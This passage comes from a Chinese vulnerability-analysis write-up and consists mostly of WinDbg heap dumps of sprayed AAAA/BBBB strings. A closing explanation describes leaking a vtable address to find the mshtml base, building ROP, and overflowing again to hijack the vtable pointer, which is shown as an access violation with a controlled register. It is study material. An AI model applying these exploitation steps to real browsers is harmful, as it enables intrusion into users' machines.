03f2b220 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b230 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b240 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b250 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b260 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b270 00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2 ........f.......
03f2b280 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b290 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b2a0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b2b0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b2c0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b2d0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b2e0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b2f0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b300 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b310 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b320 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b330 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b340 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b350 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b360 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b370 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b380 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b390 5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 [........a......
03f2b3a0 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b3b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b400 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b410 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b420 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b430 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b440 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b450 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b460 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b470 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b480 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b490 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b4a0 41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2 A.A.A...........
03f2b4b0 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b4c0 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b4d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b500 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b510 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b520 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b530 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b540 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b550 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b560 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b570 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b580 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b590 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b5c0 91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b5d0 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b5e0 e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 .....<.h........
03f2b5f0 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b600 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b620 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b650 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b660 00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03 ................
03f2b670 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b680 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b690 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6a0 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b6b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6c0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6d0 00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2 ................
03f2b6e0 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b6f0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b700 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b710 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b720 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b730 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b740 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b750 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b760 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b770 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b780 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b790 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b7a0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b7b0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b7c0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b7d0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b7e0 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b7f0 d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2b800 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b810 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b820 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b830 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b840 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b850 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b860 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b870 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b880 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b890 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8a0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b900 41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2 A.A.A...........
03f2b910 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b920 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b930 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b940 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b950 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b960 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b970 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b980 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b990 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2ba20 6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 m........j......
03f2ba30 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2ba40 50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 P....<.h........
03f2ba50 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2ba60 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2ba70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2ba80 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2ba90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baa0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bab0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bac0 00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03 ................
03f2bad0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bae0 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baf0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb00 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2bb10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb30 00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2 ........N.......
03f2bb40 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2bb50 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bb60 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bb70 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bb80 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bb90 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bba0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bbb0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bbc0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bbd0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bbe0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bbf0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bc00 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bc10 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bc20 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bc30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bc40 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2bc50 a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2bc60 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2bc70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc80 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc90 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bca0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcb0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcc0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcd0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bce0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcf0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd60 41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2 A.A.A...........
03f2bd70 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2bd80 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2bd90 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bda0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdb0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdc0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdd0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bde0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdf0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be20 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be30 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be40 42 00 42 00 42 00 42 00-42 00 42 00 B.B.B.B.B.B.
很简单的能观察到03f2ae30的AAAA字符串被大量覆盖,所以它就是vulheap。得到虚表地址后,计算mshtml基地址,构造rop。然后再次溢出,这次溢出直接像刚刚覆盖BBBB的大小一样,直接覆盖虚表指针,于是就可以劫持虚表指针到任意地址,如下
(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024--->控制虚表指针 ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
003d006b 777a ja 003d00e7 [br=1]
到此,这个洞的分析就结束了。
参考资料
《漏洞战争》
WinDbg漏洞分析调试(一):https://paper.seebug.org/179/
